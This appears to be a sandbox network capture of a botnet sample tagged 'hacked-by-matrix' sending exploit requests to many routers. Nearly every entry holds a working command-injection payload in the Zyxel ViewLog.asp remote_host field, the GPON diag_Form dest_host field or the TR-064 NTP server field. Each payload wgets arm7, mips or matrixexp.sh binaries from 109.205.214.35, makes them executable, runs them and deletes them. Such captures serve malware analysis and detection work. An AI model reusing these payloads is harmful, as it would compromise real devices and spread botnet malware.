                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:26.925204992 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        447192.168.2.1345212200.97.159.5780
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:26.326823950 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:26.576833010 CET182INHTTP/1.1 404 Not Found
                                                        Content-Length: 0
                                                        Server: HTTPD
                                                        Date: Thu, 21 Mar 2024 04:22:26 GMT
                                                        Connection: close
                                                        Content-Type: text/html
                                                        X-Frame-Options: SAMEORIGIN


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        448192.168.2.1360880118.29.0.5443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:26.534658909 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        449192.168.2.1354716109.149.103.231443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:26.534713030 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        450192.168.2.135207642.123.103.218443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:26.534713030 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        451192.168.2.1341434118.27.129.140443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:26.534742117 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        452192.168.2.134329642.83.32.253443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:26.534754992 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        453192.168.2.1353242212.28.32.203443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:26.534765959 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        454192.168.2.1354854200.88.132.4980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:26.726387024 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:27.207314968 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:28.613029003 CET97INHTTP/1.1 307
                                                        LOCATION: https://127.0.0.1/cgi-bin/ViewLog.asp
                                                        Content-Length: 0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        455192.168.2.133670283.166.130.9880
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:26.745618105 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:26.915854931 CET1252INHTTP/1.1 404 Not Found
                                                        date: Thu, 21 Mar 2024 04:22:26 GMT
                                                        server: Apache
                                                        vary: accept-language,accept-charset
                                                        upgrade: h2
                                                        connection: Upgrade
                                                        accept-ranges: bytes
                                                        transfer-encoding: chunked
                                                        content-type: text/html; charset=utf-8
                                                        content-language: en
                                                        Data Raw: 33 43 35 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 6e 75 6c 6c 40 69 6e 66 6f 6d 61 6e 69 61 6b 2e 63 68 22 20 2f 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 2f 2a 2d 2d 3e 3c 21 5b 43 44 41 54 41 5b 2f 2a 3e 3c 21 2d 2d 2a 2f 20 0a 20 20 20 20 62 6f 64 79 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 30 30 43 43 3b 20 7d 0a 20 20 20 20 70 2c 20 61 64 64 72 65 73 73 20 7b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 65 6d 3b 7d 0a 20 20 20 20 73 70 61 6e 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 73 6d 61 6c 6c 65 72 3b 7d 0a 2f 2a 5d 5d 3e 2a 2f 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 68 31 3e 0a 3c 70 3e 0a 0a 0a 20 20 20 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 0a 20 20 0a 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 0a 0a 20 20 0a 0a 3c 2f 70 3e 0a 3c 70 3e 0a 49 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2c 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 0a 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 6e 75 6c 6c 40 69 6e 66 6f 6d 61 6e 69 61 6b 2e 63 68 22 3e 77 65 62 6d 61 73 74 65 72 3c 2f 61 3e 2e 0a 0a 3c 2f 70 3e 0a 0a 3c 68 32 3e 45 72 72 6f 72 20 34 30 34 3c 2f 68 32 3e 0a 3c 61 64 64 72 65 73 73 3e 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 31 32 37 2e 30 2e 30 2e 31 3c 2f 61 3e 3c 62 72 20 2f 3e 0a 20 20 3c 73 70 61 6e 3e 41 70 61 63 68 65 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 3C5<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"><head><title>Object not found!</title><link rev="made" href="mailto:null@infomaniak.ch" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p, address {margin-left: 3em;} span {font-size: smaller;}/*...*/--></style></head><body><h1>Object not found!</h1><p> The requested URL was not found on this server. If you entered the URL manually please check your spelling and try again. </p><p>If you think this is a server error, please contactthe <a href="mailto:null@infomaniak.ch">webmaster</a>.</p><h2>Error 404</h2><address> <a href="/">127.0.0.1</a><br /> <span>Apache</span></address></body></html>0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        456192.168.2.1342018118.35.234.767547
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:26.786212921 CET734OUTPOST /UD/act?1 HTTP/1.1
                                                        Host: 127.0.0.1:7547
                                                        User-Agent: hacked-by-matrix
                                                        SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
                                                        Content-Type: text/xml
                                                        Content-Length: 526
                                                        <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://109.205.214.35/mips; chmod 777 mips; ./mips tr064`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        457192.168.2.1348402213.155.81.3580
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:27.569763899 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:27.757030010 CET989INHTTP/1.1 404 Not Found
                                                        Date: Thu, 21 Mar 2024 04:22:27 GMT
                                                        Server: Apache/2.4.56 (Debian)
                                                        Content-Length: 271
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 44 61 74 65 3a 20 54 68 75 2c 20 32 31 20 4d 61 72 20 32 30 32 34 20 30 34 3a 32 32 3a 32 37 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 30 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 